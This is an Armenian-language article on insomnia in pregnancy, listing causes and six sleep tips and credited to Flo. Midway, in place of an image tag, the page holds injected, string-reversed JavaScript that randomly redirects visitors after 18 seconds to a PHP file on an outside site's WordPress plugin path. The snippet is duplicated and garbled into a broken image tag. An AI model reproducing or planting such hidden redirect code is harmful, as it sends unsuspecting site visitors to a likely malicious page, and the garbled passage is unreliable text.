Ինչպես հաղթահարել անքնությունը հղիության ընթացքում

Հղի կանանց շրջանում անքնությունը կարող է ի հայտ գալ ցանկացած փուլում, սակայն առավել հաճախ այն հանդիպում է հղիության երրորդ եռամսյակում: Ապագա մայրերի մոտ 75 տոկոսը հղիության 39-րդ շաբաթում առնչվում է անքնության հետ:

Անքնության ախտանիշներն ի հայտ են գալիս երրորդ եռամսյակում, երբ մեծացող փորիկը սկսում է անհարմարություններ պատճառել: Հղիության ընթացքում անքնությանը նպաստող գործոններից կարելի է առանձնացնել հետևյալ մի քանիսը.

  • Հորմոնալ փոփոխություններ
  • Ոտքերի ցավեր
  • Արագ նյութափոխանակություն
  • Ծննդաբերելուց առաջ առկա անհանգստություն

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touching-her-belly_1220-850.jpg” alt=”” width=”626″ height=”417″ />

Հղիության ընթացքում անքնությունը հաղթահարելու համար կարող են օգտակար լինել հետևյալ խորհուրդները.

  1. Մշակեք քնի ռեժիմ:
  2. Օրվա ընթացքում ակտիվ եղեք:
  3. Խուսափեք կոֆեինից:
  4. Շատ ջուր խմեք:
  5. Քնի համար հարմար միջավայր ստեղծեք:
  6. Փորձեք քնի համար նոր դիրքեր բացահայտել:

Աղբյուր՝ Flo